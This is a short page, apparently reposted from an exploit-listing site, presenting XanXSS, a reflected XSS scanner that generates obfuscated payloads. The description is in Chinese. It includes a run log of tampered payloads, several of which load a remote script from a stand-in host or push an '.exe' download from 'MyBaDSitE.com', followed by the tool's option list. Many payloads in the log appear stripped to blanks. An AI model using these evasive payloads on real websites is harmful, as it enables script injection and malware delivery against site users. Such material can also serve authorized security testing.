Skip to content
XanXSS exploit

XanXSS exploit

Sploitus September 8, 2026

XanXSS 是一款反射型 XSS 搜索工具(DOM 版本即将推出),它能基于模板生成 payload。与其他仅仅遍历 payload 列表的 XSS 扫描器不同,XanXSS 会努力让 payload 变得难以识别,例如:

/>cLIcK Me! XaNxss

使用 XanXSS,每个 payload 都各不相同。XanXSS 的工作原理是遍历 payload,直到找到指定数量的有效 payload 或计时器达到最大时间,这可以避免无限循环。XanXSS 包含的一些功能:

在这个概念验证中,我们将使用

admin@TBG-a0216:~/bin/python/xanxss$ python xanxss.py -u " -a 12 -t 12 -f 25 -v

____ ___ ____ ___ _________ _________

\ \/ /____ ____ \ \/ / / _____// _____/

\ /\__ \ / \ \ / \_____ \ \_____ \

/ \ / __ \| | \/ \ / \/ \

/___/\ (____ /___| /___/\ \/_______ /_______ /

\_/ \/ \/ \_/ \/ \/

[info][16:37:34] running payloads through tampering procedures

[info][16:37:34] payloads tampered successfully

[debug][16:37:34] running payload ' '

[debug][16:37:34] running payload ' '

[debug][16:37:34] running payload ' '

[debug][16:37:34] running payload ' '

[debug][16:37:34] running payload ' A=%0aprompT,A(();=%09'htTp://xSs.rockS/XSs.Js' XAnXsS '

[debug][16:37:35] running payload ' '

[debug][16:37:35] running payload ' '

[debug][16:37:35] running payload ' xanxSS '

[debug][16:37:35] running payload ' aLert((1)); '

[debug][16:37:35] running payload ' '

[debug][16:37:35] running payload ' ConFIrm(();= wIndow.LoCATIoN= \u005g;(pRoMPT))``;=%0A'htTpS://MyBaDSitE.cOM/dOwnLoAd.phP?iTem=+(pRomPt)``;=%0apuMPEDuPkICKs.exE'jaVAScrIpt:/*--> ClIcK/*/mE! '

[debug][16:37:35] running payload ' '

[debug][16:37:36] running payload ' XanXss '

[debug][16:37:36] running payload ' '

[debug][16:37:36] running payload ' '

[debug][16:37:36] running payload ' AleRt(1); '

[debug][16:37:36] running payload ' '

[debug][16:37:36] running payload ' CLick%00Me! '

[debug][16:37:37] running payload ' ALeRt(1); '

[debug][16:37:37] running payload ' '

[debug][16:37:37] running payload ' co\U006EfiR\u006\u003id();=%09'HTtPS://MYBAdsiTE.com/doWNload.php?itEm=+((CoNfIrm)();=">puMpedUPKickS.eXe' XanXsS cLICk/*/Me! '

[debug][16:37:37] running payload ' xANXss '

[debug][16:37:37] running payload ' '

[debug][16:37:37] running payload ' '

[debug][16:37:38] running payload ' clIcK mE! '

[warning][16:37:48] times up dumping found

--------------------------------------------------

~~>

~~>

~~>

--------------------------------------------------

[info][16:37:48] found a total of 3 working payloads

Payload:` ` ![xanxsspoc1](

Payload: ` ` ![xanxsspoc2](

Payload: ` ` ![xanxsspoc3](

XanXSS 提供了完整的使用代理功能,兼容 proxychains,并允许添加自定义请求头。为了方便,我提供了所有选项的完整列表:

usage: xanxss.py [-h] [-u [-a VERIFY]

[-f AMOUNT] [-t TIME] [-p SCRIPT, [SCRIPT, ...]]

[-F FILE-PATH] [-v] [--proxy TYPE://IP:PORT]

[-H HEADER=VALUE,HEADER:VALUE] [--throttle TIME secs] [-P]

-u --url

验证步骤的数量,这将决定 payload 的可靠性。验证步骤越多,payload 越可靠(*默认=5)

尝试查找指定数量的有效 payload。指定此参数不保证你一定能找到该数量的有效 payload(*默认=25)

-t TIME, --time TIME 测试所花费的秒数,这将被用作验证的计时器(*默认=35s)

-p SCRIPT, [SCRIPT, ...], --payloads SCRIPT, [SCRIPT, ...]

传递一个逗号分隔的自定义 payload 列表,必须至少包含 5 个 payload

-v, --verbose 以详细模式运行,显示更多输出(*默认=False)

-H HEADER=VALUE,HEADER:VALUE, --headers HEADER=VALUE,HEADER:VALUE

-P, --polyglot 生成一个多语言脚本(polyglot)附加到正在运行的脚本末尾,如果存在 XSS,它应该能发现(*默认=False)

Extracted Entities

Domains (1)